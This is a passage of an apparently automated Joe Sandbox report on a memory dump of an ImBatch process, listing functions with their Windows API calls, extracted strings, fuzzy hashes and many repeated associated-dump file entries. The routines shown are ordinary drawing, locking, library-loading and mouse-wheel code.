Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0201351247fd7d29302389fc529016b6e8be297baf2abc3ab1433b8d6c1aa4c
Instruction ID: 864ca8837c77ec97b5aba73fdcb70393d9813354f3ebf7640941d99e5b4881f6
Opcode Fuzzy Hash: c0201351247fd7d29302389fc529016b6e8be297baf2abc3ab1433b8d6c1aa4c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1080DCFE Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f33faba8ef31fcfab6dc18cc30aa19a250ddf750475ce4e372638da6e39a3c
Instruction ID: 0ce15dbaf2a6a3f753fb7bdbcfa6b1bd9f4317149f6db3f28ece090aba6c1503
Opcode Fuzzy Hash: b7f33faba8ef31fcfab6dc18cc30aa19a250ddf750475ce4e372638da6e39a3c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1080DC66 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3e27854beaa66d5c9b74d02de83414b61ea2844e850dff0ffa7dd2c1d8d2fc
Instruction ID: 820e43274f45509111310afe77eba6440bb82cc89d123c520eef143b2daab3e5
Opcode Fuzzy Hash: cc3e27854beaa66d5c9b74d02de83414b61ea2844e850dff0ffa7dd2c1d8d2fc
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1080DDC2 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f845ee05923669a2a387056a43e4f9fbf9175937ecb4d0288354db09c531c4de
Instruction ID: 1b39113eb4c9b319456b374445b65d1655d2cfa2fb7632f29596312172dd9fc7
Opcode Fuzzy Hash: f845ee05923669a2a387056a43e4f9fbf9175937ecb4d0288354db09c531c4de
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10A3A6B8 Relevance: 30.4, APIs: 20, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83bf53985a1f390046807dc38bbefee14a8a9c69b4c67cddc9a9f702e187376c
Instruction ID: 58499ecfae9ab0627ab75ea308ced9c51017d1ebf1de15ac79b64ef9d727263a
Opcode Fuzzy Hash: 83bf53985a1f390046807dc38bbefee14a8a9c69b4c67cddc9a9f702e187376c
Instruction Fuzzy Hash: A4E10874E04218AFDB40EBACC982B9EBBF9EF59301F1144A5F404AB265CB34AE40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10855ACF Relevance: 25.7, APIs: 17, Instructions: 190windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 10855ADF
SelectPalette.GDI32(?,00000000,00000000), ref: 10855B1F
RealizePalette.GDI32(?), ref: 10855B2B
FillRect.USER32 ref: 10855B7C
SetTextColor.GDI32(?,00000000), ref: 10855B94
SetBkColor.GDI32(?,00000000), ref: 10855BAF
SetDIBColorTable.GDI32(?,00000000,00000002,00000000,?,00000000,?,00000000,?,?,?,?,00000000,00000000,10855D3F), ref: 10855BF8
PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 10855C1A
CreateCompatibleDC.GDI32(00000000), ref: 10855C2D
SelectObject.GDI32(?,00000000), ref: 10855C50
SelectPalette.GDI32(?,00000000,00000000), ref: 10855C6C
RealizePalette.GDI32(?), ref: 10855C77
SetTextColor.GDI32(?,00000000), ref: 10855C95
SetBkColor.GDI32(?,00000000), ref: 10855CB0
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 10855CD8
SelectPalette.GDI32(?,00000000,000000FF), ref: 10855CEA
SelectObject.GDI32(?,00000000), ref: 10855CF4
DeleteDC.GDI32(?), ref: 10855D0F

Part of subcall function 1084E910: GetSysColor.USER32(00000028), ref: 1084E91A

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ColorSelect$Palette$Object$RealizeText$CompatibleCreateDeleteFillRectTable
String ID:
API String ID: 3366061311-0
Opcode ID: 6ac49e9695f8dd91f99947ffaadb1fb28eae396553c269167135123049f15428
Instruction ID: 7275f398465d5b936e3969158a5c7f05e020691267bb9f6a00b91070bfbbbf63
Opcode Fuzzy Hash: 6ac49e9695f8dd91f99947ffaadb1fb28eae396553c269167135123049f15428
Instruction Fuzzy Hash: BA719579A04218AFDB40DFACCC95F9EB7B8EB08350F118454F914EB6A1D635ED44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1090F164 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 375COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10AA0334,00000000,1090F631,?,00000000,00000000,00000000,?,109ACCF8,?,?,?,?,00000000,00000000,00000000), ref: 1090F1C4
LeaveCriticalSection.KERNEL32(10AA0334,1090F606,00000000,1090F631,?,00000000,00000000,00000000,?,109ACCF8,?,?,?,?,00000000,00000000), ref: 1090F251
EnterCriticalSection.KERNEL32(10AA0334,00000000,1090F631,?,00000000,00000000,00000000,?,109ACCF8,?,?,?,?,00000000,00000000,00000000), ref: 1090F27B

Strings

4, xrefs: 1090F4B7
.pbm, xrefs: 1090F3ED, 1090F40A
{in}, xrefs: 1090F34B, 1090F36F
{out}, xrefs: 1090F39E, 1090F3CD
, xrefs: 1090F50F
tmp, xrefs: 1090F320, 1090F3AF

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID: $.pbm$4$tmp${in}${out}
API String ID: 2801635615-115236059
Opcode ID: bd7380135ef447081cf9ded2ce02718b518ab75fe40d25a4218ddde1cd353a11
Instruction ID: b65c2707c8dc99809666b7cb29a1a7bc1534f62457667fb1fdaa909868685e02
Opcode Fuzzy Hash: bd7380135ef447081cf9ded2ce02718b518ab75fe40d25a4218ddde1cd353a11
Instruction Fuzzy Hash: 5CE15374A042099FDB01DF68CCA5A9DB7FAFF89300F5481A9F4049B768DB35AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 109F87BC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 161registrywindowCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(109F86C0), ref: 109F883A
InitializeCriticalSection.KERNEL32(109F86A0,109F86C0), ref: 109F8846
GetVersionExW.KERNEL32(00000114,109F86A0,109F86C0), ref: 109F8897
GetSystemMetrics.USER32 ref: 109F88DF
RegisterWindowMessageW.USER32(WPTOOLS Format,00000017,00000114,109F86A0,109F86C0), ref: 109F8903
RegisterWindowMessageW.USER32(HTML Format,WPTOOLS Format,00000017,00000114,109F86A0,109F86C0), ref: 109F8913
RegisterWindowMessageW.USER32(Rich Text Format,HTML Format,WPTOOLS Format,00000017,00000114,109F86A0,109F86C0), ref: 109F8923

Part of subcall function 10857CC0: DeleteObject.GDI32(?), ref: 10857E06

Strings

WPTOOLS Format, xrefs: 109F88FE
%d , xrefs: 109F894F
Rich Text Format, xrefs: 109F891E
HTML Format, xrefs: 109F890E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MessageRegisterWindow$CriticalInitializeSection$DeleteMetricsObjectSystemVersion
String ID: %d $HTML Format$Rich Text Format$WPTOOLS Format
API String ID: 945461911-3389926205
Opcode ID: cc0ce5c9f9fa4785cafb102bde5a3aa74f5f28c3963907aca30cc2dcea9c094e
Instruction ID: f47946f7cc08bfbfc5c139e413ea94350cfe4d3a12732ae74c74052156c63dcd
Opcode Fuzzy Hash: cc0ce5c9f9fa4785cafb102bde5a3aa74f5f28c3963907aca30cc2dcea9c094e
Instruction Fuzzy Hash: 1D714C746183548BDB45DF28C8D579A3BE9EF05308F0841B9EE088F35ADB76A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1080DF34 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 62windowregistryCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(MouseZ,Magellan MSWHEEL), ref: 1080DF4E
RegisterWindowMessageW.USER32(MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 1080DF5A
RegisterWindowMessageW.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 1080DF69
RegisterWindowMessageW.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 1080DF75
SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 1080DF8D
SendMessageW.USER32(00000000,?,00000000,00000000), ref: 1080DFB1

Strings

MSH_SCROLL_LINES_MSG, xrefs: 1080DF70
MouseZ, xrefs: 1080DF49
MSH_WHEELSUPPORT_MSG, xrefs: 1080DF64
MSWHEEL_ROLLMSG, xrefs: 1080DF55
Magellan MSWHEEL, xrefs: 1080DF44

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: d99ec9eb94d5b027722fd5e7980c1eaadfe5b1ab72de1d35d7e7b8bd1fe38978
Instruction ID: 7235997962d12b275401c22ddafa034aa45d24fea6659a591350d3ebe1766062
Opcode Fuzzy Hash: d99ec9eb94d5b027722fd5e7980c1eaadfe5b1ab72de1d35d7e7b8bd1fe38978
Instruction Fuzzy Hash: EA11337560C306AFE701AF68CC81B6EB7E8EF85350F108425BD559F398EB70A840CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1080B213 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 182libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 1080B2CF
GetLastError.KERNEL32 ref: 1080B2DA
RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 1080B310
EnterCriticalSection.KERNEL32(10A9DC24), ref: 1080B322
FreeLibrary.KERNEL32(?,10A9DC24), ref: 1080B33A
LeaveCriticalSection.KERNEL32(10A9DC24,?,10A9DC24), ref: 1080B347
GetProcAddress.KERNEL32(?,?), ref: 1080B3B6
GetLastError.KERNEL32 ref: 1080B3C1
RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 1080B3F7

Part of subcall function 1080B12C: LocalAlloc.KERNEL32(00000040,00000008), ref: 1080B138
Part of subcall function 1080B12C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 1080B14D

Strings

$, xrefs: 1080B22E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
String ID: $
API String ID: 4255670546-3993045852
Opcode ID: d5df8e8af12adf97f85c990faf32357415961e6f398959ebe0468cff391f7135
Instruction ID: 85784159d13cebd3d0a59e5208ca62061eaef48fb427b31fc11e21dcd9e5b5b8
Opcode Fuzzy Hash: d5df8e8af12adf97f85c990faf32357415961e6f398959ebe0468cff391f7135
Instruction Fuzzy Hash: B561C276904606EFDB10DF98CC81FAEB7F4FF44340F118629E615A7298D7B0A981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10809D1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634,?,?,?,00000000,00000105,00000000,1080A6AF), ref: 10809D3A
LeaveCriticalSection.KERNEL32(10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634,?,?,?,00000000,00000105,00000000), ref: 10809D5E
LeaveCriticalSection.KERNEL32(10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634,?,?,?,00000000,00000105,00000000), ref: 10809D6D
IsValidLocale.KERNEL32(00000000,00000002,10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634,?,?,?,00000000), ref: 10809D81
EnterCriticalSection.KERNEL32(10A9DB5C,00000000,00000002,10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634,?,?,?), ref: 10809DDE
lstrcpynW.KERNEL32(en-US,en,,00000000,000000AA,10A9DB5C,00000000,00000002,10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000,?,1080A634), ref: 10809DFC
LeaveCriticalSection.KERNEL32(10A9DB5C,en-US,en,,00000000,000000AA,10A9DB5C,00000000,00000002,10A9DB5C,10A9DB5C,00000000,10809E21,?,?,00000000,00000000), ref: 10809E06

Strings

en-US,en,, xrefs: 10809D4A, 10809DF7

Memory Dump Source

